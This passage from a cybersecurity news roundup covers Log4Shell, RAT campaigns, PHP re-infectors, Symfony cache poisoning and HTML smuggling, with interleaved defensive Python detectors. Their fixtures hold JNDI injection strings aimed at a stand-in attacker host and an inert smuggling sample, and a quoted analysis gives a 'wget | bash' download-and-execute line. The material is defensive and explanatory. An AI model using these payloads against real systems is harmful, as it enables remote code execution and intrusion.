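        return True
    return norm.split("\\")[-1] in BROAD_DIR_NAMES


def audit_exclusions(exclusions: dict) -> list:
    """Return findings for exclusions an attacker with a foothold would happily use."""
    findings = []
    for cat in ("Paths", "TemporaryPaths"):
        for p in exclusions.get(cat, []):
            if is_broad_path(p):
                findings.append({"category": cat, "value": p, "reason": "broad or wildcard path"})
    for ext in exclusions.get("Extensions", []):
        if ext.lower() in RISKY_EXTENSIONS:
            findings.append({"category": "Extensions", "value": ext, "reason": "executable or archive type"})
    for proc in exclusions.get("Processes", []):
        if proc.lower().split("\\")[-1] in RISKY_PROCESSES:
            findings.append({"category": "Processes", "value": proc, "reason": "living-off-the-land binary"})
    return findings


# Constructed sample of what `reg query` prints; not taken from a real host.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions
    .tmp    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    C:\Program Files\VendorApp\data    REG_DWORD    0x0
    C:\Users\Public    REG_DWORD    0x0
    D:\    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
    mshta.exe    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\TemporaryPaths
"""

if __name__ == "__main__":
    for finding in audit_exclusions(parse_reg_query(SAMPLE_REG_QUERY)):
        print(finding)
```

Because the registry read needs no privileges, the same parser run on an attacker's foothold yields the same answer; the defensive value is in shrinking the list to specific application directories before anyone else reads it.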

Although a threat actor must have local access to read the Microsoft Defender exclusion list, this is far from an obstacle: many attackers are already inside compromised business networks looking for ways to move laterally as quietly as possible.

According to BleepingComputer, the issue was first noted in May by researcher Paul Bolton. Because Microsoft has yet to address it, security researchers advise administrators to configure Microsoft Defender via Group Policy when deploying their systems.

Nanocore, Netwire, and AsyncRAT Distribution Campaigns Make Use of Public Cloud Infrastructure


Threat actors are actively abusing Amazon and Microsoft public cloud services in malicious campaigns to deliver commodity remote access trojans (RATs) such as Nanocore, Netwire and AsyncRAT and siphon sensitive information from compromised systems. The spear-phishing attacks, which began in October 2021, mainly targeted companies in the United States, Canada, Italy and Singapore, according to Cisco Talos researchers.

These RAT variants are packed with features that let the operators take control of the victim's environment, execute arbitrary commands remotely and ste the victim's data.

The initial infection vector is a phishing email with a malicious ZIP attachment. The ZIP archive contains an ISO image holding a malicious loader in the form of JavaScript, a Windows batch file or a Visual Basic script. When the initial script runs on the victim's machine, it connects to a download server to fetch the next stage, which may be hosted on an Azure-based Windows server or an AWS EC2 instance.

Using existing legitimate infrastructure to support intrusions is increasingly part of the attacker's playbook, since it removes the need to host their own servers and can also serve as a cloaking strategy to avoid detection by security solutions.

Collaboration and communication applications such as Discord, Slack, and Telegram have found a place in many infection chains in recent months as channels for hijacking and exfiltrating data from victim machines. Cloud platform abuse is a tactical extension of this that attackers can use as the first step into a large array of networks.

"There are several interesting aspects to this particular campaign, and it points to some of the things we commonly see used and abused by malicious actors," said Nick Biasini, head of outreach at Cisco Talos. "From the use of cloud infrastructure to host malware to the abuse of dynamic DNS for command-and-control (C2) activities. Additionally, the layers of obfuscation point to the current state of criminal cyber activities, where it takes lots of analysis to get down to the final payload and intentions of the attack."

The use of DuckDNS, a free dynamic DNS service, to create malicious subdomains for delivering malware is also noteworthy: some of the actor-controlled subdomains resolve to the download server on Azure, while others act as C2 for the RAT payloads.

"Malicious actors are opportunistic and will always be looking for new and inventive ways to both host malware and infect victims. The abuse of platforms such as Slack and Discord as well as the related cloud abuse are part of this pattern," Biasini concluded.

Threat Actors use MSBuild to Execute Cobalt Strike Beacons


Malicious campaigns have recently been spotted abusing the Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on targeted machines. MSBuild, which was designed for building Windows applications, uses a project file element called 'Tasks' to designate components that run during the build, and threat actors are misusing these Tasks to launch malicious code under the guise of MSBuild. Renato Marinho, a Morphus Labs security researcher and SANS Internet Storm Center (ISC) handler, reports that two different malicious campaigns using MSBuild for code execution were discovered in the past week.

MSBuild is a build tool that helps automate the software development process, including source code compilation, packaging, testing, deployment, and documentation creation. Visual Studio projects and solutions can be built with MSBuild even when the Visual Studio IDE is not installed. MSBuild is free and open-source software. It was previously shipped with the .NET Framework; starting with Visual Studio 2013, it ships with Visual Studio. MSBuild is a functional replacement for the nmake utility, which is still used in projects created with older Visual Studio editions.

MSBuild operates on MSBuild project files, which have an XML syntax comparable to Apache Ant or NAnt. Despite the fact that the syntax is based on a well-defined XML schema, the fundamental structure and operation are comparable to the traditional Unix make utility: the user specifies what will be used (typically source code files) and what the result should be (typically a static library, DLL, or executable application), but the utility decides what to do and in which order to carry out the build. 

Threat actors typically gain access to the target environment with a legitimate remote desktop protocol (RDP) account, then use remote Windows Services (SCM) for lateral movement and MSBuild to execute the Cobalt Strike Beacon payload. The malicious MSBuild project is built to compile and run specific C# code, which then decodes and executes Cobalt Strike.

Marinho further reports that, after confirming that Beacon was used in the attack, he was able to decrypt the SSL-encrypted communication with the command and control (C&C) server. To prevent such attacks, the researcher recommends that enterprises use a Windows Defender Application Control (WDAC) policy to restrict Microsoft-signed applications that could be used to execute other malware; Microsoft maintains a list of these applications, and MSBuild is on it.

“There is a note for MSBuild.exe, though, that if the system is used in a development context to build managed applications, the recommendation is to allow MSBuild.exe in the code integrity policies,” Marinho concluded.

Log4j Attackers Switch to Injecting Monero Miners via RMI


The most significant vulnerability identified recently has dominated the news over the past few days. The vulnerability, known as Log4Shell or LogJam and officially tracked as CVE-2021-44228, is an unauthenticated RCE flaw that allows complete system takeover on systems running Log4j 2.0-beta9 through 2.14.1.

According to BleepingComputer, some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI, or even combined the two in a single request, to improve their chances of success. This is a notable development in the ongoing attacks, and organizations should be aware of it as they try to secure every possible channel.

For now, threat actors trying to hijack resources for Monero mining are the ones adopting this shift, but others may follow at any time. The majority of attacks targeting the Log4j "Log4Shell" vulnerability have used the LDAP (Lightweight Directory Access Protocol) service.

Switching to the RMI (Remote Method Invocation) API may appear counter-intuitive at first sight, given that this technique is subject to additional checks and limitations. 

However, this is not always the case: if some JVM (Java Virtual Machine) versions do not enforce strict rules, RMI may be an easier route to RCE (remote code execution) than LDAP. Furthermore, LDAP queries have become a well-established part of the infection chain, and defenders are watching them closely. Many IDS/IPS solutions, for example, already filter requests using JNDI and LDAP, so RMI may be overlooked for the time being. In some cases, Juniper observed both RMI and LDAP services in the same HTTP POST request.

As per the source, “This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script. During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine."

"This obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x86_64 Linux targets. The full script also adds persistence via the cron subsystem."

"A different attack, also detected by Juniper Threat Labs, tries both RMI and LDAP services in the same HTTP POST request in hopes that at least one will work. The LDAP injection string is sent as part of the POST command body. An exploit string in the POST body is unlikely to succeed, given that most applications do not log the POST body, which can be binary or very large; but by tagging the string as “username” in the JSON body, the attackers hope to exploit applications that will treat this request as a login attempt and log the failure."
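The detection gap described above (LDAP-only filters missing RMI lookups, and lookups hidden in a JSON login body) can be closed with a small request inspector. The code below is an added example, not Juniper's or BleepingComputer's; the request format and hostnames are constructed for illustration.

```python
import json
import re
from typing import Any, Dict, List

# A JNDI lookup followed by its provider scheme. LDAP dominated early
# exploitation; the article describes a shift to RMI and to requests that
# carry both. Case-insensitive because Log4j's lookup parser is.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds)\s*:", re.IGNORECASE)


def jndi_schemes(text: str) -> List[str]:
    """Return the scheme of every JNDI lookup found in text, in order."""
    return [m.group(1).lower() for m in JNDI_RE.finditer(text)]


def json_strings(obj: Any) -> List[str]:
    """Flatten every string value out of a parsed JSON document."""
    if isinstance(obj, str):
        return [obj]
    if isinstance(obj, dict):
        return [s for v in obj.values() for s in json_strings(v)]
    if isinstance(obj, list):
        return [s for v in obj for s in json_strings(v)]
    return []


def inspect_request(req: Dict[str, Any]) -> Dict[str, List[str]]:
    """Scan the request target, every header value and, for JSON bodies,
    every string field. Returns {location: [schemes]} for locations that
    contain a lookup; an empty dict means nothing was found."""
    headers = req.get("headers", {})
    fields = [("target", req.get("target", ""))]
    fields += [("header:" + k, v) for k, v in headers.items()]
    body = req.get("body", "")
    if body and "json" in headers.get("Content-Type", "").lower():
        try:
            fields += [("body:json", s) for s in json_strings(json.loads(body))]
        except ValueError:
            fields.append(("body:raw", body))  # malformed JSON is still scanned
    elif body:
        fields.append(("body:raw", body))
    hits: Dict[str, List[str]] = {}
    for loc, value in fields:
        found = jndi_schemes(value)
        if found:
            hits.setdefault(loc, []).extend(found)
    return hits


def scan_all(requests: List[Dict[str, Any]]) -> List[Dict[str, List[str]]]:
    """Inspect a batch of requests; one result dict per request."""
    return [inspect_request(r) for r in requests]


# Constructed sample traffic (not captured data); hostnames are placeholders.
SAMPLE_REQUESTS = [
    {"target": "/index.html",                                    # LDAP in a header
     "headers": {"User-Agent": "${jndi:ldap://attacker.example/a}"}, "body": ""},
    {"target": "/search?q=${JNDI:RMI://attacker.example/b}",     # RMI, mixed case
     "headers": {"User-Agent": "curl/7.0"}, "body": ""},
    {"target": "/api/login?x=${jndi:rmi://attacker.example/c}",  # both in one POST
     "headers": {"Content-Type": "application/json"},
     "body": json.dumps({"username": "${jndi:ldap://attacker.example/d}", "password": "x"})},
    {"target": "/api/login", "headers": {"Content-Type": "application/json"},
     "body": json.dumps({"username": "alice", "password": "x"})},  # benign
]

if __name__ == "__main__":
    for i, hit in enumerate(scan_all(SAMPLE_REQUESTS)):
        print(i, hit or "clean")
```

Production detectors must also normalise the nested-lookup obfuscation the article alludes to; this example checks the plain form only.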

Threat actors appear to be interested in mining Monero on hacked devices and present it as an apparently harmless activity that "ain't going to hurt anyone else." The miner is built for x86_64 Linux systems and uses the cron subsystem for persistence. Although the majority of attacks have targeted Linux systems, Check Point reports that its investigators have discovered the first Win32 program to exploit Log4Shell, called 'StealthLoader'.

The only way to combat what has become one of the most serious vulnerabilities in recent history is to upgrade Log4j to version 2.16.0. Administrators should also monitor Apache's security page for new version announcements and apply them as soon as possible.

A Ransomware Attack Targeted Virginia Legislature Agencies and Commissions


A ransomware attack has caused the suspension of computer systems and websites for Virginia legislative agencies and commissions, including the Division of Capitol Police and the Division of Legislative Services, which is preparing bills and resolutions for the forthcoming General Assembly session. 

The attack started on Sunday at the Department of Legislative Automated Systems and has now expanded to practically all legislative branch websites, with the exception of the Legislative Information System on the General Assembly website. It has had no effect on state executive branch agencies. 

Virginia Governor Ralph Northam's spokesperson, Alena Yarmosky, said the governor has been briefed on the attack. The incident was communicated to the state's legislative leaders by email, informing them that hackers had attacked the state's computers.

“Currently the bad guys have most of our critical systems locked up except for LIS,” Dave Burhop, director of the legislative IT agency, informed Senate and House of Delegates early on Monday morning. Capitol Police's website is unavailable, although spokesperson Joe Macenka stated that, "All of our critical communication systems are fine."

The attack employs ransomware, which a criminal organization plants in vital computer systems in order to extort money. The governor's office and Burhop both confirmed that the state had received a ransom note, but neither said what it contained. “The bad guys have left us a ransom note but details are scant and no amount of ransom has been specified yet,” Burhop said in the email to the House and Senate clerks.

According to Senate Clerk Susan Schaar, the Department of Legislative Automated Services is collaborating with the Virginia Information Technologies Agency to resolve the problem. VITA provides assistance to approximately 60 agencies in the executive department of state government. The legislative IT sites are managed separately from the executive branch sites by the Department of Legislative Automated Systems, according to Yarmosky. “As such, VITA has very little knowledge of the system and security architecture or tools in place to address cyber-attacks.”

The Virginia Defense Force and the Virginia Department of Military Affairs reported in September that they had been victims of a cyberattack in July. Attacks on local governments at the city, county, and state levels have netted ransomware groups millions of dollars. According to The Washington Post, experts say at least 2,354 governments, healthcare facilities, and schools in the United States were hit with ransomware in 2020.

PHP Re-Infectors: The Malware that Never Goes Away


Threat actors typically infect sites for monetary gain, to improve their SEO rankings for malware or spam campaigns, and for a variety of other purposes. If the malware is easily and quickly removed, the attack's objective is defeated. In most cases of this type of infection, researchers found a modified index.php. According to the researchers, it makes little difference if your site is not running WordPress; attackers will usually replace index.php with an infected copy of the WordPress index.php file.

The index.php file is a PHP file that serves as the entry point for a website or application. It is a template file containing a variety of code that is executed as PHP. Because the same infected copy is dropped on anything from a simple HTML website upwards, it is also modified before delivery.

It has also been observed that hundreds, if not thousands, of infected .htaccess files are scattered throughout the website directories. These are intended to block custom PHP files or tools from executing on the site, or to allow dangerous files to run if some mitigation is already in place. In rare cases, the attackers leave a copy of the original index.php file named old-index.php or 1index.php on the server. In most situations, the infected files have 444 permissions, and attempting to remove or clean them directly is futile because the malware immediately creates a new infected copy.

In rare situations, the malware will be found in the memory of php-fpm. If index.php keeps being recreated, run top to see whether php-fpm is running. According to the researchers, you can try clearing OPcache, although this normally does not solve the problem.

OPcache boosts PHP performance by keeping pre-compiled script bytecode in shared memory, eliminating the need for PHP to load and parse scripts on every request. As a result, malware can remain in OPcache after being removed from the site files or database. 
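A triage script that surfaces the symptoms just described (tampered index.php, files locked to mode 444, leftover backup copies, .htaccess sprawl) is a useful first step before cleanup. This is an added example, not the researchers' tooling; the webroot it scans is a constructed fixture built in a temporary directory.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Set, Tuple

# Backup copies the article says attackers sometimes leave next to index.php.
LEFTOVER_NAMES = {"old-index.php", "1index.php"}


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def triage(webroot: Path, known_good_index: Set[str]) -> Dict[str, List[str]]:
    """Walk the webroot and collect: index.php files whose hash is not in the
    known-good set, index.php/.htaccess files locked to mode 444, leftover
    backup copies, and every .htaccess so the sprawl is visible. Paths are
    reported relative to the webroot."""
    report: Dict[str, List[str]] = {
        "modified_index": [], "locked_444": [], "leftover_copies": [], "htaccess": []}
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            p = Path(dirpath) / name
            rel = str(p.relative_to(webroot))
            mode = stat.S_IMODE(p.stat().st_mode)
            if name == ".htaccess":
                report["htaccess"].append(rel)
            if name in ("index.php", ".htaccess") and mode == 0o444:
                report["locked_444"].append(rel)
            if name == "index.php" and sha256_of(p) not in known_good_index:
                report["modified_index"].append(rel)
            if name in LEFTOVER_NAMES:
                report["leftover_copies"].append(rel)
    for entries in report.values():
        entries.sort()
    return report


def build_sample_site() -> Tuple[Path, Set[str]]:
    """Constructed fixture, not a real compromised site: one clean index.php,
    one tampered and locked index.php with a leftover copy beside it, and
    read-only .htaccess files scattered through the tree."""
    root = Path(tempfile.mkdtemp(prefix="reinfector-demo-"))
    clean = b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n"
    (root / "index.php").write_bytes(clean)
    uploads = root / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    tampered = uploads / "index.php"
    tampered.write_bytes(b"<?php\n/* constructed placeholder, not malware */\n" + clean)
    tampered.chmod(0o444)
    (uploads / "old-index.php").write_bytes(clean)
    for d in (root, root / "wp-content", uploads):
        ht = d / ".htaccess"
        ht.write_text("# constructed placeholder\n")
        ht.chmod(0o444)
    return root, {hashlib.sha256(clean).hexdigest()}


if __name__ == "__main__":
    site, good = build_sample_site()
    for key, entries in triage(site, good).items():
        print(f"{key}: {entries}")
```

On a real site, feed triage() the hashes of the pristine index.php for the installed CMS version; anything the report lists under modified_index should be compared against that copy before it is restored.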

Although attackers are constantly looking for new ways to infect websites, there are several standard steps site owners can take to reduce infections: put the website behind a firewall; change all admin passwords regularly, including those for the admin dashboard, cPanel/FTP, SSH, and email; keep all plugins, themes, and the CMS up to date; and delete any unnecessary plugins or themes.

Threat Actors Use Phishing Kits to Target Mobile Devices


A few threat actors are motivated by political leaders, some others by mischief or malice, but most are in the game purely for money. To keep criminal activity profitable, the potential payday has to be balanced against time, risk, and the resources required. It is no surprise, then, that phishing is the go-to attack for many: malicious emails can reach many targets with little effort, and threat actors can buy readily available phishing kits that supply the basic prerequisites for a campaign.

After a thorough analysis of phishing email traffic, experts found that most of these attacks follow the money, targeting either large financial firms or big tech companies. Apple, Facebook (now Meta), and Amazon were among the top brands targeted in phishing campaigns. "On the financial side, Charles Schwab was by far the most popular target, and was the most used brand URL overall, accounting for 13.5 percent of all cases. Chase Bank – an American subsidiary of JP Morgan Chase & Co – RBC Royal Bank and Wells Fargo were also widely used in phishing URLs," reports Help Net Security.

The top trend experts noticed was the use of mobile channels such as WhatsApp, SMS, and other services for these phishing attacks. Threat actors have adopted these techniques in response to strict email security solutions. A mobile device is considered less secure than a desktop endpoint when facing a phishing attack: even if the phone has a business email app, channels like WhatsApp and SMS bypass whatever anti-phishing protection the device has.

Cybercriminals might also combine mobile messaging and email in a single attack, for instance by sending a phishing email containing a QR code that is scanned with a phone, which evades detection and reaches the mobile endpoint. "Mobile-based phishing attacks are also harder to identify due to mobile devices’ smaller screen and simplified layout, compounding the lack of security solutions on mobile," reports Help Net Security.

Symfony PHP Framework has a Cache Poisoning Bug


Websites built on the Symfony framework were vulnerable to web cache poisoning attacks due to mishandling of HTTP headers. Symfony is a popular PHP framework for web applications that has received over 200 million downloads to date. The platform was found to be vulnerable to web cache poisoning attacks, potentially exposing sensitive information such as users' IP addresses.

Web cache poisoning is a sophisticated technique in which an attacker exploits the behavior of a web server and its cache to serve a malicious HTTP response to other users. It has two stages. First, the attacker must find a way to elicit a response from the back-end server that carries a harmful payload. Once that succeeds, they must ensure the response is cached and then served to the intended victims.

A poisoned web cache has the potential to be a catastrophic means of disseminating a variety of attacks, including XSS, JavaScript injection, open redirection, and so on. 

Manipulation of unkeyed inputs, such as headers, is at the heart of any web cache poisoning attack. When deciding whether to serve a cached response to a user, web caches ignore unkeyed inputs. Because of this, threat actors can use them to inject a payload and elicit a "poisoned" response, which, if cached, is served to every user with the matching cache key.

The bug arose when a Symfony-based website ran behind a proxy or load balancer; it has since been fixed. In such setups developers can tell Symfony to look for X-Forwarded-* headers, which carry further information about the client such as the original IP address, protocol, and port. Symfony uses a trusted_headers allow list to limit which of these headers are honored and so prevent web cache poisoning attacks. In version 5.2, Symfony's developers added support for the X-Forwarded-Prefix header, which carries the request's original path base.

The flaw was in the sub-request feature, which lets developers render and serve a small section of a page instead of the whole page, according to a GitHub advisory. Sub-requests processed the X-Forwarded-Prefix header even when it was not on the trusted headers list. By crafting malicious sub-requests carrying the X-Forwarded-Prefix header and getting them stored by cache servers, attackers could carry out web cache poisoning.
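The interaction of an unkeyed header, a sub-request that skips the allow list, and a path-keyed cache is easiest to see in a small model. The code below is an added example, a deliberately simplified simulation rather than Symfony's code: the proxy address, header names, and the path-only cache key are all assumptions, and the vulnerable and fixed behaviours sit side by side.

```python
from dataclasses import dataclass, field
from typing import Dict


@dataclass
class Request:
    path: str
    headers: Dict[str, str] = field(default_factory=dict)   # lower-case names
    client_ip: str = "203.0.113.10"                          # documentation range


# Simplified model of the trusted-proxy configuration described above
# (constructed; not Symfony's code). The site trusts one proxy and has NOT
# put X-Forwarded-Prefix on its trusted_headers list.
TRUSTED_PROXIES = {"10.0.0.1"}
TRUSTED_HEADERS = {"x-forwarded-for", "x-forwarded-host", "x-forwarded-proto"}


def base_path(req: Request, apply_allow_list: bool) -> str:
    """Path prefix used when generating links. The vulnerable variant honours
    X-Forwarded-Prefix unconditionally; the fixed one only when the request
    came from a trusted proxy AND the header is on the allow list."""
    prefix = req.headers.get("x-forwarded-prefix", "")
    if apply_allow_list and (req.client_ip not in TRUSTED_PROXIES
                             or "x-forwarded-prefix" not in TRUSTED_HEADERS):
        return ""
    return prefix.rstrip("/")


def render_fragment(req: Request, apply_allow_list: bool) -> str:
    """The sub-request: renders a small fragment containing an absolute link."""
    return f'<a href="{base_path(req, apply_allow_list)}/login">Login</a>'


def render_page(req: Request, apply_allow_list: bool) -> str:
    """Main page. The sub-request inherits the incoming headers, which is
    where the prefix header slipped past the allow list."""
    sub = Request(req.path, dict(req.headers), req.client_ip)
    return "<html>" + render_fragment(sub, apply_allow_list) + "</html>"


class PathKeyedCache:
    """Shared cache keyed on the path only: request headers are unkeyed, so
    whatever the first requester provokes is served to everyone after."""

    def __init__(self, apply_allow_list: bool) -> None:
        self.store: Dict[str, str] = {}
        self.apply_allow_list = apply_allow_list

    def get(self, req: Request) -> str:
        if req.path not in self.store:
            self.store[req.path] = render_page(req, self.apply_allow_list)
        return self.store[req.path]


def poisoning_succeeds(apply_allow_list: bool) -> bool:
    """Replays the scenario: an untrusted client sends the unkeyed header
    first, then an ordinary user requests the same path with no header.
    Returns True if the user receives the attacker-controlled link."""
    cache = PathKeyedCache(apply_allow_list)
    cache.get(Request("/", {"x-forwarded-prefix": "//attacker.example"},
                      client_ip="198.51.100.7"))
    victim_view = cache.get(Request("/", {}))
    return "attacker.example" in victim_view


if __name__ == "__main__":
    print("vulnerable:", poisoning_succeeds(apply_allow_list=False))  # True
    print("fixed:     ", poisoning_succeeds(apply_allow_list=True))   # False
```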

BazarLoader's Arrival and Delivery Vectors now Include Compromised Installers and ISO


While the number of BazarLoader detections rose in the third quarter, two new delivery methods joined the list of mechanisms threat actors use for data theft and ransomware. One approach uses compromised software installers, in which malicious actors bundle BazarLoader with genuine products. The second approach places a Windows shortcut (LNK) and a dynamic link library (DLL) payload in an ISO file. The United States has seen the highest number of BazarLoader attacks.

Researchers detected tainted versions of the VLC and TeamViewer software bundled with BazarLoader, according to reports. While the original delivery technique has yet to be identified, the use of these packages may be part of a larger social engineering campaign aimed at convincing individuals to download and install the infected installers. A BazarLoader executable is dropped and executed when the installer runs. This is also one of the most noticeable differences from recent BazarLoader arrival approaches, which relied on dynamic link libraries (DLL).

Meanwhile, a distribution technique based on ISO files has been uncovered, in which the BazarLoader DLL is launched via DLL and LNK files included in the ISO. The LNK file uses a folder icon to trick the user into double-clicking it, which launches the BazarLoader DLL. The "EnterDLL" export function, recently used by BazarLoader, is then called. Rundll32.exe launches the malicious DLL and connects to the C&C server before injecting itself into a suspended MS Edge process.

As threat actors change their attack techniques to avoid detection, the number of arrival-mechanism variations used in BazarLoader campaigns keeps growing. Because single detection methods have limits, both techniques matter and still work despite not being novel.

While compromised installers have been seen with other malware, their large file size can still pose a problem for detection systems such as sandboxes that apply file size limits. LNK files used as shortcuts, on the other hand, will almost certainly be obfuscated by the additional layers placed between the shortcut and the malicious files.

BazarLoader will continue to evolve as a standalone information stealer, as initial-access malware-as-a-service (MaaS) for other malware operators, and as a secondary payload delivery mechanism for even more destructive attacks such as modern ransomware. Against unknown threats, security teams need multi-layered systems capable of pattern recognition and behavior monitoring, while making the monitoring and tracking of known threats more visible using known data.

Microsoft Issued a Warning About a Rise in HTML Smuggling Phishing Attacks


Malware campaigns that use HTML smuggling to deliver banking malware and remote access trojans (RATs) have increased, according to Microsoft. While HTML smuggling is not a new tactic, it is increasingly used by threat actors to evade detection, including the Nobelium hacking group behind the SolarWinds attacks.

HTML smuggling is a nasty technique that slips past traditional network perimeter defenses such as web proxies and email gateways because the malware is assembled inside the network after an employee opens a web page or attachment containing a malicious HTML script. As a result, a company's network can be compromised even if gateway devices inspect for suspicious EXE, ZIP, or Office documents.

"When a target user opens the HTML in their web browser, the browser decodes the malicious script, which, in turn, assembles the payload on the host device. Thus, instead of having a malicious executable pass directly through a network, the attacker builds the malware locally behind a firewall," Microsoft warns. 

HTML smuggling is a phishing method that uses HTML5 and JavaScript to encode strings in an HTML attachment or web page in order to hide harmful payloads. When a user opens the attachment or clicks a link, the browser decodes these strings. A phishing HTML attachment, for example, could contain a harmless-looking link to a well-known website. When the user clicks the link, however, JavaScript decodes an encrypted or encoded string in the link and turns it into a harmful file that is downloaded instead.

Because the malicious payload is initially encoded, security software does not recognize it as harmful. And because JavaScript assembles the payload on the target machine, it bypasses firewalls and other perimeter controls that would normally stop the malicious file at the perimeter.

"Disabling JavaScript could mitigate HTML smuggling created using JavaScript Blobs. However, JavaScript is used to render business-related and other legitimate web pages," Microsoft explains. "In addition, there are multiple ways to implement HTML smuggling through obfuscation and numerous ways of coding JavaScript, making the said technique highly evasive against content inspection." Between July and August, Microsoft discovered an increase in HTML smuggling in campaigns that transmit RATs like AsyncRAT/NJRAT.
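Since the gateway cannot see the file, inspection has to happen on the HTML attachment itself: look for the client-side assembly pattern (decode an embedded string, wrap it in a Blob, hand it to the user as a download) and decode any long embedded literal to see what it would become. The scanner below is an added example, not Microsoft's tooling; both sample attachments are constructed, and the "payload" in the suspicious one is an inert MZ marker followed by zero bytes.

```python
import base64
import re
from typing import Dict, List

# Source-level indicators of client-side payload assembly. None is malicious
# on its own (ordinary download pages use several); the combination of
# decoding an embedded string into a Blob and handing it to the user as a
# file is the pattern described above.
INDICATORS = {
    "blob_construct": re.compile(r"new\s+Blob\s*\(", re.I),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "legacy_save": re.compile(r"msSaveOrOpenBlob\s*\(", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']", re.I),
}
# Long base64-looking string literals: the encoded payload itself.
BLOB_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{200,}={0,2})[\"']")


def indicators(html: str) -> List[str]:
    return [name for name, rx in INDICATORS.items() if rx.search(html)]


def embedded_literals(html: str) -> List[bytes]:
    """Decode every long base64 literal so its real file type can be checked."""
    out: List[bytes] = []
    for m in BLOB_LITERAL.finditer(html):
        try:
            out.append(base64.b64decode(m.group(1), validate=True))
        except ValueError:
            pass  # not valid base64 after all; ignore
    return out


def looks_like_executable(data: bytes) -> bool:
    """File types a gateway would block if they arrived directly: PE, ZIP, ELF."""
    return data[:2] == b"MZ" or data[:4] in (b"PK\x03\x04", b"\x7fELF")


def score(html: str) -> Dict[str, object]:
    """Returns a verdict plus the evidence behind it."""
    found = indicators(html)
    blobs = embedded_literals(html)
    assembles_file = "blob_construct" in found and (
        "object_url" in found or "legacy_save" in found)
    verdict = "clean"
    if assembles_file and ("base64_decode" in found or blobs):
        verdict = "suspicious"
        if any(looks_like_executable(b) for b in blobs):
            verdict = "high"
    return {"verdict": verdict, "indicators": found, "embedded_blobs": len(blobs)}


# Constructed samples, not real attachments. The "payload" is an MZ marker
# followed by zero bytes, so it is inert, and the script is deliberately partial.
_FAKE_PE_B64 = base64.b64encode(b"MZ" + b"\0" * 200).decode()

SMUGGLING_SAMPLE = f"""<html><body><script>
var data = atob("{_FAKE_PE_B64}");
var blob = new Blob([data], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.exe";
</script></body></html>"""

BENIGN_SAMPLE = """<html><body>
<a href="/files/report.pdf" download="report.pdf">Download the report</a>
</body></html>"""

if __name__ == "__main__":
    print(score(SMUGGLING_SAMPLE))   # verdict: high
    print(score(BENIGN_SAMPLE))      # verdict: clean
```

As Microsoft notes above, the JavaScript can be obfuscated in many ways, so a regex scanner like this catches only the plain form and belongs alongside sandbox detonation of HTML attachments, not in place of it.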